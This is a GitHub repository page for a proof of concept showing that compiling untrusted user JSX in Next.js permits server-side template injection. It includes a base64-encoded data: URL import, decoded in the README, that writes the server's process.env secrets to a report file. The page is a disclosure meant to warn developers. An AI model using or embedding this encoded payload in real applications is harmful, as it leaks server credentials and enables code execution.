PoC: Next.js x Untrusted User Template Compilation

You should not compile Untrusted User Template(JSX/React Component), because it will cause Remote Code Execution.

Search Word: Server Side Template Injection

Code

export default function Home() {
    import('data:text/javascript;charset=utf-8;base64,cHJvY2Vzcy5yZXBvcnQud3JpdGVSZXBvcnQoInRlc3QiLCBuZXcgRXJyb3IoSlNPTi5zdHJpbmdpZnkocHJvY2Vzcy5lbnYpKSk7IGV4cG9ydCBkZWZhdWx0IDE7').then(r => {
        console.log(r)
    });
    return <></>
}

Raw:

process.report.writeReport("test", new Error(JSON.stringify(process.env))); export default 1;

Stringify process.env
Write the env to test file

It will leak your server environment as a file.

References:

Dev

yarn install
yarn static-build

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
pages		pages
public		public
styles		styles
.eslintrc.json		.eslintrc.json
.gitignore		.gitignore
README.md		README.md
next.config.js		next.config.js
package.json		package.json
yarn.lock		yarn.lock

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

pages

pages

public

public

styles

styles

.eslintrc.json

.eslintrc.json

.gitignore

.gitignore

README.md

README.md

next.config.js

next.config.js

package.json

package.json

yarn.lock

yarn.lock

Repository files navigation

PoC: Next.js x Untrusted User Template Compilation

Code

Dev

Related

About

Releases

Sponsor this project

Packages

Languages

azu/nextjs-untrusted-user-template-injection

Folders and files

Latest commit

History

Repository files navigation

PoC: Next.js x Untrusted User Template Compilation

Code

Dev

Related

About

Resources

Code of conduct

Security policy

Stars

Watchers

Forks

Sponsor this project

Languages